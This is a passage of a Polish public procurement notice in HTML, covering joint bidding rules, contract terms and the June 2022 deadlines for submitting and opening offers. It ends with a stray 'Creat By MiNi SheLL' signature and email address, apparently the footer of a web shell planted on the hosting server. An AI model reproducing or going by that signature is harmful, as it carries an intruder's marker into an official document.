pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, jeżeli w imieniu<br/>Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z odpisu lub informacji Krajowego<br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru,<br/>3) pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu<br/>albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy);<br/>4) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4<br/>ustawy, z którego wynika, które usługi wykonają poszczególni wykonawcy – zgodnie z Załącznikiem nr 3 do SIWZ (jeśli<br/>dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Stosowne pełnomocnictwo należy złożyć wraz z ofertą.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia kluczowych zadań dotyczących wykonania usługi.<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wielu Wykonawców, oświadczenie, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp<br/>o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału<br/>w postępowaniu w zakresie wskazanym przez Zamawiającego składa każdy<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian zawartej umowy w przypadkach, o których mowa w art. 455 ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com